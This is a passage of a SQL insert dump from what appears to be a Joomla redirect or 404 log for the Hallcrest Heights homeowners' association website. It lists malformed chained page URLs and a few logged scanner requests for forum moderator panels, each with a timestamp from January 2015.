23:52:28','0000-00-00 00:00:00'),(721,'http://www.hallcrestheights.org//association/board-members.html//association/about-us.html','','','',1,0,'2015-01-07 23:52:30','0000-00-00 00:00:00'),(722,'http://www.hallcrestheights.org//association/board-members.html//association/board-members.html','','','',1,0,'2015-01-07 23:52:31','0000-00-00 00:00:00'),(723,'http://www.hallcrestheights.org//association/board-members.html//association/newsletters.html','','','',1,0,'2015-01-07 23:52:32','0000-00-00 00:00:00'),(724,'http://www.hallcrestheights.org//association/board-members.html//interests.html','','','',1,0,'2015-01-07 23:52:34','0000-00-00 00:00:00'),(725,'http://www.hallcrestheights.org//association/board-members.html//site-map.html','','','',1,0,'2015-01-07 23:52:35','0000-00-00 00:00:00'),(726,'http://www.hallcrestheights.org//association/board-members.html//terms-of-service.html','','','',1,0,'2015-01-07 23:52:36','0000-00-00 00:00:00'),(727,'http://www.hallcrestheights.org//association/board-members.html//privacy-policy.html','','','',1,0,'2015-01-07 23:52:38','0000-00-00 00:00:00'),(728,'http://www.hallcrestheights.org//association/newsletters.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:52:40','0000-00-00 00:00:00'),(729,'http://www.hallcrestheights.org//association/newsletters.html//community/announcements.html','','','',1,0,'2015-01-07 23:52:42','0000-00-00 00:00:00'),(730,'http://www.hallcrestheights.org//association/newsletters.html//community/events.html','','','',1,0,'2015-01-07 23:52:43','0000-00-00 00:00:00'),(731,'http://www.hallcrestheights.org//association/newsletters.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:52:44','0000-00-00 00:00:00'),(732,'http://www.hallcrestheights.org//association/newsletters.html//association/about-us.html','','','',1,0,'2015-01-07 23:52:46','0000-00-00 00:00:00'),(733,'http://www.hallcrestheights.org//association/newsletters.html//association/board-members.html','','','',1,0,'2015-01-07 23:52:47','0000-00-00 00:00:00'),(734,'http://www.hallcrestheights.org//association/newsletters.html//association/newsletters.html','','','',1,0,'2015-01-07 23:52:48','0000-00-00 00:00:00'),(735,'http://www.hallcrestheights.org//association/newsletters.html//interests.html','','','',1,0,'2015-01-07 23:52:50','0000-00-00 00:00:00'),(736,'http://www.hallcrestheights.org//association/newsletters.html//site-map.html','','','',1,0,'2015-01-07 23:52:51','0000-00-00 00:00:00'),(737,'http://www.hallcrestheights.org//association/newsletters.html//terms-of-service.html','','','',1,0,'2015-01-07 23:52:52','0000-00-00 00:00:00'),(738,'http://www.hallcrestheights.org//association/newsletters.html//privacy-policy.html','','','',1,0,'2015-01-07 23:52:53','0000-00-00 00:00:00'),(739,'http://www.hallcrestheights.org//interests.html//community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:52:57','0000-00-00 00:00:00'),(740,'http://www.hallcrestheights.org//interests.html//community/announcements.html','','','',1,0,'2015-01-07 23:52:58','0000-00-00 00:00:00'),(741,'http://www.hallcrestheights.org//interests.html//community/events.html','','','',1,0,'2015-01-07 23:52:59','0000-00-00 00:00:00'),(742,'http://www.hallcrestheights.org//interests.html//community/real-estate-guide.html','','','',1,0,'2015-01-07 23:53:01','0000-00-00 00:00:00'),(743,'http://www.hallcrestheights.org//interests.html//association/about-us.html','','','',1,0,'2015-01-07 23:53:02','0000-00-00 00:00:00'),(744,'http://www.hallcrestheights.org//interests.html//association/board-members.html','','','',1,0,'2015-01-07 23:53:03','0000-00-00 00:00:00'),(745,'http://www.hallcrestheights.org//interests.html//association/newsletters.html','','','',1,0,'2015-01-07 23:53:05','0000-00-00 00:00:00'),(746,'http://www.hallcrestheights.org//interests.html//interests.html','','','',1,0,'2015-01-07 23:53:06','0000-00-00 00:00:00'),(747,'http://www.hallcrestheights.org//interests.html//site-map.html','','','',1,0,'2015-01-07 23:53:12','0000-00-00 00:00:00'),(748,'http://www.hallcrestheights.org//interests.html//terms-of-service.html','','','',1,0,'2015-01-07 23:53:14','0000-00-00 00:00:00'),(749,'http://www.hallcrestheights.org//interests.html//privacy-policy.html','','','',1,0,'2015-01-07 23:53:15','0000-00-00 00:00:00'),(750,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:53:18','0000-00-00 00:00:00'),(751,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/community/announcements.html','','','',1,0,'2015-01-07 23:53:19','0000-00-00 00:00:00'),(752,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/community/events.html','','','',1,0,'2015-01-07 23:53:20','0000-00-00 00:00:00'),(753,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:53:22','0000-00-00 00:00:00'),(754,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/association/about-us.html','','','',1,0,'2015-01-07 23:53:23','0000-00-00 00:00:00'),(755,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/association/board-members.html','','','',1,0,'2015-01-07 23:53:25','0000-00-00 00:00:00'),(756,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/association/newsletters.html','','','',1,0,'2015-01-07 23:53:26','0000-00-00 00:00:00'),(757,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/interests.html','','','',1,0,'2015-01-07 23:53:27','0000-00-00 00:00:00'),(758,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/site-map.html','','','',1,0,'2015-01-07 23:53:30','0000-00-00 00:00:00'),(759,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/terms-of-service.html','','','',1,0,'2015-01-07 23:53:31','0000-00-00 00:00:00'),(760,'http://www.hallcrestheights.org//interests.html/interests/16-how-to-avoid-special-assessments.html/privacy-policy.html','','','',1,0,'2015-01-07 23:53:33','0000-00-00 00:00:00'),(761,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:53:36','0000-00-00 00:00:00'),(762,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/community/announcements.html','','','',1,0,'2015-01-07 23:53:37','0000-00-00 00:00:00'),(763,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/community/events.html','','','',1,0,'2015-01-07 23:53:38','0000-00-00 00:00:00'),(764,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:53:39','0000-00-00 00:00:00'),(765,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/association/about-us.html','','','',1,0,'2015-01-07 23:53:41','0000-00-00 00:00:00'),(766,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/association/board-members.html','','','',1,0,'2015-01-07 23:53:42','0000-00-00 00:00:00'),(767,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/association/newsletters.html','','','',1,0,'2015-01-07 23:53:43','0000-00-00 00:00:00'),(768,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/interests.html','','','',1,0,'2015-01-07 23:53:45','0000-00-00 00:00:00'),(769,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/site-map.html','','','',1,0,'2015-01-07 23:53:47','0000-00-00 00:00:00'),(770,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/terms-of-service.html','','','',1,0,'2015-01-07 23:53:49','0000-00-00 00:00:00'),(771,'http://www.hallcrestheights.org//interests.html/interests/15-the-hallcrest-annual-meeting.html/privacy-policy.html','','','',1,0,'2015-01-07 23:53:50','0000-00-00 00:00:00'),(772,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:53:53','0000-00-00 00:00:00'),(773,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/community/announcements.html','','','',1,0,'2015-01-07 23:53:54','0000-00-00 00:00:00'),(774,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/community/events.html','','','',1,0,'2015-01-07 23:53:55','0000-00-00 00:00:00'),(775,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:53:57','0000-00-00 00:00:00'),(776,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/association/about-us.html','','','',1,0,'2015-01-07 23:53:58','0000-00-00 00:00:00'),(777,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/association/board-members.html','','','',1,0,'2015-01-07 23:53:59','0000-00-00 00:00:00'),(778,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/association/newsletters.html','','','',1,0,'2015-01-07 23:54:01','0000-00-00 00:00:00'),(779,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/interests.html','','','',1,0,'2015-01-07 23:54:02','0000-00-00 00:00:00'),(780,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/site-map.html','','','',1,0,'2015-01-07 23:54:05','0000-00-00 00:00:00'),(781,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/terms-of-service.html','','','',1,0,'2015-01-07 23:54:06','0000-00-00 00:00:00'),(782,'http://www.hallcrestheights.org//interests.html/interests/12-go-green.html/privacy-policy.html','','','',1,0,'2015-01-07 23:54:07','0000-00-00 00:00:00'),(783,'http://www.hallcrestheights.org//interests.html/interests/11-energy-tips.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:54:10','0000-00-00 00:00:00'),(784,'http://www.hallcrestheights.org//interests.html/interests/11-energy-tips.html/community/announcements.html','','','',1,0,'2015-01-07 23:54:11','0000-00-00 00:00:00'),(785,'http://www.hallcrestheights.org//interests.html/interests/11-energy-tips.html/community/events.html','','','',1,0,'2015-01-07 23:54:12','0000-00-00 00:00:00'),(786,'http://www.hallcrestheights.org//interests.html/interests/11-energy-tips.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:54:14','0000-00-00 00:00:00'),(787,'http://www.hallcrestheights.org/association/Choice/Opt-out','','http://www.hallcrestheights.org/association/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:38:17','0000-00-00 00:00:00'),(788,'http://www.hallcrestheights.org/association/www.fxva.com/our-community/great-falls-mclean/attractions/%E2%80%8E','','http://www.hallcrestheights.org/association/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:38:29','0000-00-00 00:00:00'),(789,'http://www.hallcrestheights.org/association/www.fairsandfestivals.net/states/va','','http://www.hallcrestheights.org/association/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:38:33','0000-00-00 00:00:00'),(790,'http://www.hallcrestheights.org/community/www.fairsandfestivals.net/states/va','','http://www.hallcrestheights.org/community/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:39:36','0000-00-00 00:00:00'),(791,'http://www.hallcrestheights.org/community/Choice/Opt-out','','http://www.hallcrestheights.org/community/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:39:40','0000-00-00 00:00:00'),(792,'http://www.hallcrestheights.org/community/www.fxva.com/our-community/great-falls-mclean/attractions/%E2%80%8E','','http://www.hallcrestheights.org/community/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:39:48','0000-00-00 00:00:00'),(793,'http://www.hallcrestheights.org/www.fxva.com/our-community/great-falls-mclean/attractions/%E2%80%8E','','http://www.hallcrestheights.org/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:41:04','0000-00-00 00:00:00'),(794,'http://www.hallcrestheights.org/www.fairsandfestivals.net/states/va','','http://www.hallcrestheights.org/2-uncategorised.feed?type=rss','',1,0,'2015-01-11 15:41:16','0000-00-00 00:00:00'),(795,'http://HALLCRESTHEIGHTS.ORG/modcp/index.php','','','',1,0,'2015-01-22 06:16:09','0000-00-00 00:00:00'),(796,'http://HALLCRESTHEIGHTS.ORG/vb/modcp/index.php','','','',1,0,'2015-01-22 06:16:10','0000-00-00 00:00:00'),(797,'http://HALLCRESTHEIGHTS.ORG/cc/modcp/index.php','','','',1,0,'2015-01-22 06:16:11','0000-00-00 00:00:00'),(798,'http://HALLCRESTHEIGHTS.ORG/forum/modcp/index.php','','','',1,0,'2015-01-22 06:16:12','0000-00-00 00:00:00'),(799,'http://HALLCRESTHEIGHTS.ORG/forums/modcp/index.php','','','',1,0,'2015-01-22 06:16:12','0000-00-00 00:00:00'),(800,'http://HALLCRESTHEIGHTS.ORG/vbulletin/modcp/index.php','','','',1,0,'2015-01-22 06:16:18','0000-00-00 00:00:00'),(801,'http://HALLCRESTHEIGHTS.ORG/community/modcp/index.php','','','',1,0,'2015-01-22 06:16:18','0000-00-00 00:00:00'),(802,'http://hallcrestheights.org/community/neighborhood-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:18:55','0000-00-00 00:00:00'),(803,'http://hallcrestheights.org/community/neighborhood-guide.html/community/announcements.html','','','',1,0,'2015-01-29 15:18:55','0000-00-00 00:00:00'),(804,'http://hallcrestheights.org/community/neighborhood-guide.html/community/events.html','','','',1,0,'2015-01-29 15:18:55','0000-00-00 00:00:00'),(805,'http://hallcrestheights.org/community/neighborhood-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:18:56','0000-00-00 00:00:00'),(806,'http://hallcrestheights.org/community/neighborhood-guide.html/association/about-us.html','','','',1,0,'2015-01-29 15:18:56','0000-00-00 00:00:00'),(807,'http://hallcrestheights.org/community/neighborhood-guide.html/association/board-members.html','','','',1,0,'2015-01-29 15:18:56','0000-00-00 00:00:00'),(808,'http://hallcrestheights.org/community/neighborhood-guide.html/association/newsletters.html','','','',1,0,'2015-01-29 15:18:56','0000-00-00 00:00:00'),(809,'http://hallcrestheights.org/community/neighborhood-guide.html/interests.html','','','',1,0,'2015-01-29 15:18:56','0000-00-00 00:00:00'),(810,'http://hallcrestheights.org/community/neighborhood-guide.html/announcements.html','','','',1,0,'2015-01-29 15:18:57','0000-00-00 00:00:00'),(811,'http://hallcrestheights.org/community/neighborhood-guide.html/site-map.html','','','',1,0,'2015-01-29 15:18:57','0000-00-00 00:00:00'),(812,'http://hallcrestheights.org/community/neighborhood-guide.html/terms-of-service.html','','','',1,0,'2015-01-29 15:18:57','0000-00-00 00:00:00'),(813,'http://hallcrestheights.org/community/neighborhood-guide.html/privacy-policy.html','','','',1,0,'2015-01-29 15:18:57','0000-00-00 00:00:00'),(814,'http://hallcrestheights.org/community/announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:00','0000-00-00 00:00:00'),(815,'http://hallcrestheights.org/community/announcements.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:00','0000-00-00 00:00:00'),(816,'http://hallcrestheights.org/community/announcements.html/community/events.html','','','',1,0,'2015-01-29 15:19:00','0000-00-00 00:00:00'),(817,'http://hallcrestheights.org/community/announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:00','0000-00-00 00:00:00'),(818,'http://hallcrestheights.org/community/announcements.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:01','0000-00-00 00:00:00'),(819,'http://hallcrestheights.org/community/announcements.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:01','0000-00-00 00:00:00'),(820,'http://hallcrestheights.org/community/announcements.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:01','0000-00-00 00:00:00'),(821,'http://hallcrestheights.org/community/announcements.html/interests.html','','','',1,0,'2015-01-29 15:19:01','0000-00-00 00:00:00'),(822,'http://hallcrestheights.org/community/announcements.html/announcements.html','','','',1,0,'2015-01-29 15:19:01','0000-00-00 00:00:00'),(823,'http://hallcrestheights.org/community/announcements.html/site-map.html','','','',1,0,'2015-01-29 15:19:02','0000-00-00 00:00:00'),(824,'http://hallcrestheights.org/community/announcements.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:02','0000-00-00 00:00:00'),(825,'http://hallcrestheights.org/community/announcements.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:02','0000-00-00 00:00:00'),(826,'http://hallcrestheights.org/community/events.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:04','0000-00-00 00:00:00'),(827,'http://hallcrestheights.org/community/events.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:05','0000-00-00 00:00:00'),(828,'http://hallcrestheights.org/community/events.html/community/events.html','','','',1,0,'2015-01-29 15:19:05','0000-00-00 00:00:00'),(829,'http://hallcrestheights.org/community/events.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:05','0000-00-00 00:00:00'),(830,'http://hallcrestheights.org/community/events.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:05','0000-00-00 00:00:00'),(831,'http://hallcrestheights.org/community/events.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:06','0000-00-00 00:00:00'),(832,'http://hallcrestheights.org/community/events.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:06','0000-00-00 00:00:00'),(833,'http://hallcrestheights.org/community/events.html/interests.html','','','',1,0,'2015-01-29 15:19:06','0000-00-00 00:00:00'),(834,'http://hallcrestheights.org/community/events.html/announcements.html','','','',1,0,'2015-01-29 15:19:06','0000-00-00 00:00:00'),(835,'http://hallcrestheights.org/community/events.html/site-map.html','','','',1,0,'2015-01-29 15:19:06','0000-00-00 00:00:00'),(836,'http://hallcrestheights.org/community/events.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:07','0000-00-00 00:00:00'),(837,'http://hallcrestheights.org/community/events.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:07','0000-00-00 00:00:00'),(838,'http://hallcrestheights.org/community/real-estate-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:11','0000-00-00 00:00:00'),(839,'http://hallcrestheights.org/community/real-estate-guide.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:11','0000-00-00 00:00:00'),(840,'http://hallcrestheights.org/community/real-estate-guide.html/community/events.html','','','',1,0,'2015-01-29 15:19:12','0000-00-00 00:00:00'),(841,'http://hallcrestheights.org/community/real-estate-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:12','0000-00-00 00:00:00'),(842,'http://hallcrestheights.org/community/real-estate-guide.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:12','0000-00-00 00:00:00'),(843,'http://hallcrestheights.org/community/real-estate-guide.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:12','0000-00-00 00:00:00'),(844,'http://hallcrestheights.org/community/real-estate-guide.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:13','0000-00-00 00:00:00'),(845,'http://hallcrestheights.org/community/real-estate-guide.html/interests.html','','','',1,0,'2015-01-29 15:19:13','0000-00-00 00:00:00'),(846,'http://hallcrestheights.org/community/real-estate-guide.html/site-map.html','','','',1,0,'2015-01-29 15:19:13','0000-00-00 00:00:00'),(847,'http://hallcrestheights.org/community/real-estate-guide.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:13','0000-00-00 00:00:00'),(848,'http://hallcrestheights.org/community/real-estate-guide.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:14','0000-00-00 00:00:00'),(849,'http://hallcrestheights.org/association/about-us.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:16','0000-00-00 00:00:00'),(850,'http://hallcrestheights.org/association/about-us.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:16','0000-00-00 00:00:00'),(851,'http://hallcrestheights.org/association/about-us.html/community/events.html','','','',1,0,'2015-01-29 15:19:16','0000-00-00 00:00:00'),(852,'http://hallcrestheights.org/association/about-us.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:17','0000-00-00 00:00:00'),(853,'http://hallcrestheights.org/association/about-us.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:17','0000-00-00 00:00:00'),(854,'http://hallcrestheights.org/association/about-us.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:17','0000-00-00 00:00:00'),(855,'http://hallcrestheights.org/association/about-us.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:17','0000-00-00 00:00:00'),(856,'http://hallcrestheights.org/association/about-us.html/interests.html','','','',1,0,'2015-01-29 15:19:18','0000-00-00 00:00:00'),(857,'http://hallcrestheights.org/association/about-us.html/site-map.html','','','',1,0,'2015-01-29 15:19:18','0000-00-00 00:00:00'),(858,'http://hallcrestheights.org/association/about-us.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:18','0000-00-00 00:00:00'),(859,'http://hallcrestheights.org/association/about-us.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:18','0000-00-00 00:00:00'),(860,'http://hallcrestheights.org/association/board-members.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:21','0000-00-00 00:00:00'),(861,'http://hallcrestheights.org/association/board-members.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:21','0000-00-00 00:00:00'),(862,'http://hallcrestheights.org/association/board-members.html/community/events.html','','','',1,0,'2015-01-29 15:19:21','0000-00-00 00:00:00'),(863,'http://hallcrestheights.org/association/board-members.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:21','0000-00-00 00:00:00'),(864,'http://hallcrestheights.org/association/board-members.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:22','0000-00-00 00:00:00'),(865,'http://hallcrestheights.org/association/board-members.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:22','0000-00-00 00:00:00'),(866,'http://hallcrestheights.org/association/board-members.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:22','0000-00-00 00:00:00'),(867,'http://hallcrestheights.org/association/board-members.html/interests.html','','','',1,0,'2015-01-29 15:19:23','0000-00-00 00:00:00'),(868,'http://hallcrestheights.org/association/board-members.html/site-map.html','','','',1,0,'2015-01-29 15:19:23','0000-00-00 00:00:00'),(869,'http://hallcrestheights.org/association/board-members.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:23','0000-00-00 00:00:00'),(870,'http://hallcrestheights.org/association/board-members.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:23','0000-00-00 00:00:00'),(871,'http://hallcrestheights.org/announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:19:45','0000-00-00 00:00:00'),(872,'http://hallcrestheights.org/announcements.html/community/announcements.html','','','',1,0,'2015-01-29 15:19:46','0000-00-00 00:00:00'),(873,'http://hallcrestheights.org/announcements.html/community/events.html','','','',1,0,'2015-01-29 15:19:46','0000-00-00 00:00:00'),(874,'http://hallcrestheights.org/announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:19:46','0000-00-00 00:00:00'),(875,'http://hallcrestheights.org/announcements.html/association/about-us.html','','','',1,0,'2015-01-29 15:19:46','0000-00-00 00:00:00'),(876,'http://hallcrestheights.org/announcements.html/association/board-members.html','','','',1,0,'2015-01-29 15:19:47','0000-00-00 00:00:00'),(877,'http://hallcrestheights.org/announcements.html/association/newsletters.html','','','',1,0,'2015-01-29 15:19:47','0000-00-00 00:00:00'),(878,'http://hallcrestheights.org/announcements.html/interests.html','','','',1,0,'2015-01-29 15:19:47','0000-00-00 00:00:00'),(879,'http://hallcrestheights.org/announcements.html/announcements.html','','','',1,0,'2015-01-29 15:19:47','0000-00-00 00:00:00'),(880,'http://hallcrestheights.org/announcements.html/site-map.html','','','',1,0,'2015-01-29 15:19:47','0000-00-00 00:00:00'),(881,'http://hallcrestheights.org/announcements.html/terms-of-service.html','','','',1,0,'2015-01-29 15:19:48','0000-00-00 00:00:00'),(882,'http://hallcrestheights.org/announcements.html/privacy-policy.html','','','',1,0,'2015-01-29 15:19:48','0000-00-00 00:00:00'),(883,'http://hallcrestheights.org/terms-of-service.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:20:29','0000-00-00 00:00:00'),(884,'http://hallcrestheights.org/terms-of-service.html/community/announcements.html','','','',1,0,'2015-01-29 15:20:29','0000-00-00 00:00:00'),(885,'http://hallcrestheights.org/terms-of-service.html/community/events.html','','','',1,0,'2015-01-29 15:20:30','0000-00-00 00:00:00'),(886,'http://hallcrestheights.org/terms-of-service.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:20:30','0000-00-00 00:00:00'),(887,'http://hallcrestheights.org/terms-of-service.html/association/about-us.html','','','',1,0,'2015-01-29 15:20:30','0000-00-00 00:00:00'),(888,'http://hallcrestheights.org/terms-of-service.html/association/board-members.html','','','',1,0,'2015-01-29 15:20:30','0000-00-00 00:00:00'),(889,'http://hallcrestheights.org/terms-of-service.html/association/newsletters.html','','','',1,0,'2015-01-29 15:20:31','0000-00-00 00:00:00'),(890,'http://hallcrestheights.org/terms-of-service.html/interests.html','','','',1,0,'2015-01-29 15:20:31','0000-00-00 00:00:00'),(891,'http://hallcrestheights.org/terms-of-service.html/terms-of-service.html','','','',1,0,'2015-01-29 15:20:31','0000-00-00 00:00:00'),(892,'http://hallcrestheights.org/terms-of-service.html/privacy-policy.html','','','',1,0,'2015-01-29 15:20:31','0000-00-00 00:00:00'),(893,'http://hallcrestheights.org/terms-of-service.html/site-map.html','','','',1,0,'2015-01-29 15:20:31','0000-00-00 00:00:00'),(894,'http://hallcrestheights.org/privacy-policy.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:20:35','0000-00-00 00:00:00'),(895,'http://hallcrestheights.org/privacy-policy.html/community/announcements.html','','','',1,0,'2015-01-29 15:20:35','0000-00-00 00:00:00'),(896,'http://hallcrestheights.org/privacy-policy.html/community/events.html','','','',1,0,'2015-01-29 15:20:35','0000-00-00 00:00:00'),(897,'http://hallcrestheights.org/privacy-policy.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:20:35','0000-00-00 00:00:00'),(898,'http://hallcrestheights.org/privacy-policy.html/association/about-us.html','','','',1,0,'2015-01-29 15:20:36','0000-00-00 00:00:00'),(899,'http://hallcrestheights.org/privacy-policy.html/association/board-members.html','','','',1,0,'2015-01-29 15:20:36','0000-00-00 00:00:00'),(900,'http://hallcrestheights.org/privacy-policy.html/association/newsletters.html','','','',1,0,'2015-01-29 15:20:36','0000-00-00 00:00:00'),(901,'http://hallcrestheights.org/privacy-policy.html/interests.html','','','',1,0,'2015-01-29 15:20:36','0000-00-00 00:00:00'),(902,'http://hallcrestheights.org/privacy-policy.html/privacy-policy.html','','','',1,0,'2015-01-29 15:20:37','0000-00-00 00:00:00'),(903,'http://hallcrestheights.org/privacy-policy.html/site-map.html','','','',1,0,'2015-01-29 15:20:37','0000-00-00 00:00:00'),(904,'http://hallcrestheights.org/privacy-policy.html/terms-of-service.html','','','',1,0,'2015-01-29 15:20:37','0000-00-00 00:00:00'),(905,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:20:40','0000-00-00 00:00:00'),(906,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/community/announcements.html','','','',1,0,'2015-01-29 15:20:41','0000-00-00 00:00:00'),(907,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/community/events.html','','','',1,0,'2015-01-29 15:20:41','0000-00-00 00:00:00'),(908,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:20:41','0000-00-00 00:00:00'),(909,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/association/about-us.html','','','',1,0,'2015-01-29 15:20:42','0000-00-00 00:00:00'),(910,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/association/board-members.html','','','',1,0,'2015-01-29 15:20:42','0000-00-00 00:00:00'),(911,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/association/newsletters.html','','','',1,0,'2015-01-29 15:20:42','0000-00-00 00:00:00'),(912,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/interests.html','','','',1,0,'2015-01-29 15:20:42','0000-00-00 00:00:00'),(913,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/site-map.html','','','',1,0,'2015-01-29 15:20:45','0000-00-00 00:00:00'),(914,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/terms-of-service.html','','','',1,0,'2015-01-29 15:20:45','0000-00-00 00:00:00'),(915,'http://hallcrestheights.org/interests.html/interests/16-how-to-avoid-special-assessments.html/privacy-policy.html','','','',1,0,'2015-01-29 15:20:46','0000-00-00 00:00:00'),(916,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:20:48','0000-00-00 00:00:00'),(917,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/community/announcements.html','','','',1,0,'2015-01-29 15:20:48','0000-00-00 00:00:00'),(918,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/community/events.html','','','',1,0,'2015-01-29 15:20:48','0000-00-00 00:00:00'),(919,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:20:49','0000-00-00 00:00:00'),(920,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/association/about-us.html','','','',1,0,'2015-01-29 15:20:49','0000-00-00 00:00:00'),(921,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/association/board-members.html','','','',1,0,'2015-01-29 15:20:49','0000-00-00 